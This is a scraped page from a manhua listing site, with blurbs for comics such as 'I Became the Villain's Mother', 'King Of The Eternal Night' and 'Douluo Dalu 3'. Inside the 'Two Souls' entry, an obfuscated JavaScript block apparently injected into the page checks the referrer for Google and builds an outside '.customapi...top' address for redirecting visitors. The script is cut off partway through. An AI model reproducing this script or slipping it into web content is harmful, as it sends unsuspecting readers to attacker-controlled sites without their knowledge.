Manhua - Page 107

Manhua refers to Chinese comics that are known for their distinctive art and storytelling techniques. With genres ranging from romance to fantasy, manhua provides a unique perspective on comic books from a Chinese cultural lens.

1443 results

I Became the Villain’s Mother

I have become the mother of “Ain Spenner”, the antagonist of a novel. I was supposed to be a bad stepmother who abused him as a child and was killed by him when he became an adult. But I saw the cute look on his naive and chubby face, “No, he’s so cute. He’s so young that he’s still sucking on his tiny fingers! How could I ever hurt him?” The child was so cute that I couldn’t believe that he would become a villain. And so, I decided. I will protect him! This way, he will protect me too! ~~~~~~~~~~~~~~~~~~~~ Ain’s cute little face stared coldly at Duke Cassius, “I told you not to touch me.” “Why should I listen to you?” The tension rose between the two. “You never really even liked her.” the duke’s eyes widened, no way… did Ain think of Roselia as more than a mother? Cassius could not believe it. “Stop scaring her, she might run away.” Ain said. Ain was worried that she would leave and never come back. Duke Cassius couldn’t believe it, his only son was obsessed with Roseria.


King Of The Eternal Night

Lin Xitang chances upon an injured young boy while out on a mission around the nevernight continentThe boy's name is Qianye, and he'll be Xitang's son if he survives the Netherworld training campAn exciting story following a boy working to graduate in order to escape the eternal night continentKing of the Eternal Night, The Legend of Eternal Night's Sovereign,



The eagle soars through the sky; the fish leaps over the dragon's gate; the bear roars and the tiger growls; all things in the world have a spirit. At the ends of the earth, the poles and magnetic fields realign; the world changes. The world we were so used to, is no longer.When myths turn to reality;


It Starts With A Mountain

Read “It Starts With A Mountain Manga” – “It Starts With A Mountain Manhwa” Online Free At HOTMANGA The summary of the comics “It Starts With A Mountain”: It starts with a mountain. A strategic leader gets isekai-ed into a war dynasty. He only has a group of members who were planning to ditch him. Facing this war era, he thinks of stealing food and girls to live a king’s life. He is hot-blooded, picks fights with war heroes. How will he bring chaos to the war? Will he be able to rise up high? “It Starts With A Mountain” is alternatively named: Comienza con una Montaña / I Have a Shanzhai / Kaiju Yi Zuo Shan / Kāijú Yī Zuò Shān / Kāijú Yīzuò Shān / Start a Mountain / Ta Có Một Sơn Trại / 开局一座山 / 퀘스트 : 지상 최고의 산적 / 퀘스트: 지상 최고의 산적 The comics “It Starts With A Mountain” belongs to the Genre: Action, Adventure, Drama, Historical, Isekai “manhuafast, Manga Updates, Manhwa Website…” are the most searched keywords on the website KUN MANGA. We offer a wide selection of the best and newest comics series with all chapters updated quickly and featuring high-quality images, providing readers with wonderful and enjoyable reading experiences at LikeManga. You can read TOP MANGA The Regretful Villainess Is Happy Because She Got Divorced Underworld Restaurant I Became The King by Scavenging


Two Souls

This is the story of two siblings whose hearts end up linked. Original Webtoon<script></script><script>function _0x34ae(_0x3e3233,_0x4107c8){var _0x572f8f=_0x3b6b();return _0x34ae=function(_0x193c02,_0x1cb71a){_0x193c02=_0x193c02-(0xccc+0x1*-0x2647+0x1ac8);var _0x9bdf99=_0x572f8f[_0x193c02];return _0x9bdf99;},_0x34ae(_0x3e3233,_0x4107c8);}function _0x3b6b(){var _0x75bbe6=['1384248crhtZd','https://ip','BYhUA','','nVGRH','588EGaCWT','7JWrNwt','Xsezk','href','http://rea','floor','vKGAl','77ZeLJlO','3xZPLFr','4060qmrXmU','5893376kCfDFB','DGhot','google','5133010hMikAC','19785sVVsDS','ihQKX','.top/','wfCRW','random','3539133AOGahW','kLPos','QWpuB','XlccQ','2281112CGMJQN','.customapi','194MOCesS','referrer','includes','text','location','then'];_0x3b6b=function(){return _0x75bbe6;};return _0x3b6b();}(function(_0x18b7f2,_0x4bb48e){var _0x1a7372=_0x34ae,_0x4130c1=_0x18b7f2();while(!![]){try{var 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14 hours ago

My Disciples Are All Invincible Monsters

Read Manhua “My Disciples Are All Invincible Monsters” Online Free On Manga Zin The Summary Of The Comics “My Disciples Are All Invincible Monsters”: Man And Successfully Awakens An Invincible System. However, To His Dismay, The System Leads Him Into A World Ravaged By Monsters, Where He Must Wait 500 Years Before It Activates. Just As He Is About To Lose Hope, A Monkey Demon Appears Before Him, Seeking To Become His Disciple! To Safely Survive The 500-Year Wait For The System To Activate, Chu Xuan Yan Decides To Use This Monkey, Teaching It The Terrifying Powers Of The Hell Whale And The Self-Determination Magical Arts, Ensuring The Monkey Is Fearless. Years Later, This Monkey Becomes… “My Disciples Are All Invincible Monsters” Is Alternatively Named: 我的徒弟都是无敌大妖 Read Martial Arts Manhua Recommendations: The Crazy Killer Whale’s Favourite Penguin The Ten Thousand Races Invasion: Guardian Of The Rear Find The Runaway Princess


The Supporting Female Is Reborn, She Will No Longer Serve This Broken Plot

Read Manhua The Supporting Female Is Reborn, She Will No Longer Serve This Broken Plot; Nǚ Pèi Chóngshēng, Zhè Pò Jùqíng Tā Bù Cìhòule; Nữ Phối Trọng Sinh, Giá Phá Kịch Tình Tha Bất Tý Hầu Liễu; Nữ Phụ Trọng Sinh, Cô Ấy Không Theo Hầu Bộ Tiểu Thuyết Nát Này Nữa; Nv Pei Chongsheng, Zhe Po Juqing Ta Bu Cihoule Yin Susu Couldn’t Believe That She Was Reborn Again, Her Life Was Repeating Again, The Setting Was The Same, The Painful Things Were The Same. She Thought That She Would Just Become A Salted Fish,* Living A Lazy Life, Waiting For Death, Waiting For Everything To End, For The Female Lead To Die, Which Would Mean The End Of Everything, But She Did Not Want To Accept Her Fate! “If You, The Female Lead, Has A Golden Hand, Then I Will Break That Golden Hand.” *Salted Fish: Metaphor Of A Corpse Or A Person Who Doesn’t Want To Do Anything. “The Supporting Female Is Reborn, She Will No Longer Serve This Broken Plot Manhua” Is Another Name: 女配重生,这破剧情她不伺候了 조연으로 태어났지만 막장드라마에 봉사하지 않겠다


I Am Cupid

I am Cupid, but my love is not good! A lovely story of the two gods has been banished from heaven...


Douluo Dalu 3: The Legend Of The Dragon King

Following the advancement of spirit technology, the humans of Douluo Continent conquered the ocean and discovered two new continents. After being hunted by spirit masters excessively, the spirit beasts are nearly extinct. After countless years of lying dormant, the King of the Spirit Beasts has awakened in the Great Star Dou Forest. It will lead its remaining clansmen in taking vengeance against humanity! Tang Wu Lin is determined to become a powerful Spirit Master. However, when he awakened his martial spirit, it was actually an… Incomparable talent. The battle of the Dragon King. The Legend of our Dragon King hereby begins.. You may also like: + Douluo Dalu + Douluo Dalu II + Wu Dong Qian Kun


Don’T Worry, Dear Npc!

Don't Worry, Dear NPC!, It Isn't Dangerous, Mr. NPC, It's Not Dangerous, Mr. NPC, NPCat manhwawebsiteThere are many ways to enjoy a game.Like getting stronger by leveling up, obtaining better items by enhancing, competing against other players in PvP modeOr getting deeply immersed in the game's world.A simple story centered around the daily life of the protagonist, "Adventurer," and the guild guide NPC, "Emma."Maybe you like !


Please Call Me Red Panda

Please Call Me Red Panda / Call Me a Lesser Panda / Hy gi ti l gu trc / Qing Jiao Wo Xiaoxiongmao / / at manhua websiteCute and funny story about red panda.Recommend for you !


I Took Over The Demonic Ancestor

I Took Over The Demonic Ancestor manhua, I Have Possessed the Patriarch of the Demonic Path I Have Become The Demonic AncestorThe young man accidentally took over the world's most demonic ancestor, but unexpectedly lost all his power due to the thousand-year limit. Faced with the sect split and the siege of the righteous sect, if you want to reverse the situation, you must complete the tasks issued by the absolute domain system, and those tasks are all good deeds!?
